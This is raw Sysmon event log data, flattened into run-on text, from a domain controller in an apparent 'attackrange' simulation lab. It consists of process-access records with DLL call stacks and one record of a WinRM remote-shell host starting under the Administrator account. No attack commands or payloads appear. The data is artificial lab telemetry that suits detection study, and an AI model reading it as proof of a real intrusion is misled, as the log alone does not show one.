15:53:04.473{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CE0-5FA1-2F01-000000008801}884C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005699Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-2F01-000000008801}884C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005698Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-3001-000000008801}4740C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005697Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005696Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005695Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005693Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005692Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005691Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005690Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005689Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005688Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-2F01-000000008801}884C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005687Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CE0-5FA1-2F01-000000008801}884C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005686Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.459{D28789B6-7CE0-5FA1-2F01-000000008801}884C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000005685Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.458{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005684Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.442{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005683Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.442{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005682Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-2E01-000000008801}3284C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005681Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005680Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005679Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005677Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005676Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005675Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.254{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005674Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 